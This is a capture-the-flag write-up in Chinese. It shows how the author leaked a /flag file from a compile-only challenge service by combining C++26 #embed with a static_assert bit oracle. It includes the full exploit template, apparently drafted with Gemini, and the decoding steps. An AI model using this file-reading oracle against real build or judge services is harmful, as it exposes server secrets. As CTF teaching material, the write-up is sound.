# Warden++

> 我们已经把 g++ 的版本更新到了 g++-15，支持 C++26 的若干 feature

那显然使用C++最新最热的feature在编译期泄露flag了。谷歌搜索一下，就可以发现C++26新增了[embed](https://en.cppreference.com/w/cpp/preprocessor/embed) 功能，可以在编译期用文件内容初始化一个数组，这个数组甚至可以是constexpr，意味着我们能用它进行其他编译期操作。

```python
result = subprocess.run(
    ["g++-15", tmp.name],
    stdout=subprocess.DEVNULL,
    stderr=subprocess.DEVNULL,
    text=True,
)
```

本题比较尴尬的一点是没有回显，但是代码里有print(stderr)，怀疑是后期加难度了。那既然没有回显，只能error based每次泄露一个bit了。一个思路是用static_assert，当输入的第i位是0返回false，是1返回true。

我又懒了，请出Gemini指导：


In [1]:
SOURCE_TEMPLATE = """\
#include <type_traits>
#include <cstddef>

#ifndef BITPOS
#define BITPOS {NTHBIT} // 0-based bit index across the whole file
#endif

#ifndef EXPECT
#define EXPECT 1 // succeed when bit == EXPECT (0 or 1)
#endif

// 把 flag 文件嵌入为编译期数组
constexpr unsigned char flag_content[] = {
#embed "/flag"
};

// ------- 编译期工具 -------
template <auto &Arr>
struct arr_info
{
    // 计算数组长度（元素个数）
    static constexpr std::size_t N =
        std::extent_v<std::remove_reference_t<decltype(Arr)>>;
};

template <auto &Arr, std::size_t BitPos>
struct bit_at
{
    static constexpr std::size_t byte = BitPos / 8;
    static constexpr std::size_t bit = BitPos % 8; // 0 表示最低位（LSB）
    static_assert(byte < arr_info<Arr>::N, "BITPOS out of range");
    static constexpr unsigned value = (Arr[byte] >> bit) & 1u;
};

// ------- 触发判定（成功/失败） -------
using gate = std::bool_constant<
    (bit_at<flag_content, static_cast<std::size_t>(BITPOS)>::value == EXPECT)>;

static_assert(gate::value,
              "compile gate failed: bit != EXPECT (flip EXPECT or BITPOS)");

// 也可以什么都不写；到这一步如果没有 static_assert 触发就算成功
int main() { return 0; }
"""

In [2]:
def generate_source(nthbit) -> str:
    source = SOURCE_TEMPLATE.replace("{NTHBIT}", str(nthbit))
    return source + '\nEND\n'

generate_source(0)

'#include <type_traits>\n#include <cstddef>\n\n#ifndef BITPOS\n#define BITPOS 0 // 0-based bit index across the whole file\n#endif\n\n#ifndef EXPECT\n#define EXPECT 1 // succeed when bit == EXPECT (0 or 1)\n#endif\n\n// 把 flag 文件嵌入为编译期数组\nconstexpr unsigned char flag_content[] = {\n#embed "/flag"\n};\n\n// ------- 编译期工具 -------\ntemplate <auto &Arr>\nstruct arr_info\n{\n    // 计算数组长度（元素个数）\n    static constexpr std::size_t N =\n        std::extent_v<std::remove_reference_t<decltype(Arr)>>;\n};\n\ntemplate <auto &Arr, std::size_t BitPos>\nstruct bit_at\n{\n    static constexpr std::size_t byte = BitPos / 8;\n    static constexpr std::size_t bit = BitPos % 8; // 0 表示最低位（LSB）\n    static_assert(byte < arr_info<Arr>::N, "BITPOS out of range");\n    static constexpr unsigned value = (Arr[byte] >> bit) & 1u;\n};\n\n// ------- 触发判定（成功/失败） -------\nusing gate = std::bool_constant<\n    (bit_at<flag_content, static_cast<std::size_t>(BITPOS)>::value == EXPECT)>;\n\nstatic_assert(gate::value,\n  

In [3]:
def bytes_to_zeroone(data: bytes) -> str:
    # 每个字节格式化为8位二进制，小端对齐，最后拼成一长串
    return ' '.join(f'{byte:08b}' for byte in data)
bytes_to_zeroone(b'flag{')

'01100110 01101100 01100001 01100111 01111011'

In [8]:
b = "011001100011011010000110111001101101111010100010110010101100011010000010000011101010011011111010001011101010011011000110000100100111011010010010100010101010101010100110110011101111101010101110000011100010001010000110001010101010001011111010111011101001001000101110000100101111101000101110100100101011001010100110101111100101000000000000000000"

# byte is little-endian
b_in_bytes = ([b[i:i+8][::-1] for i in range(0, len(b), 8)])
# decode them
decoded_bytes = bytes(int(byte, 2) for byte in b_in_bytes)
decoded_bytes

b'flag{EScApe_tecHnIQUes_upDaTE_wItH_tIMe}\n\x00\x00'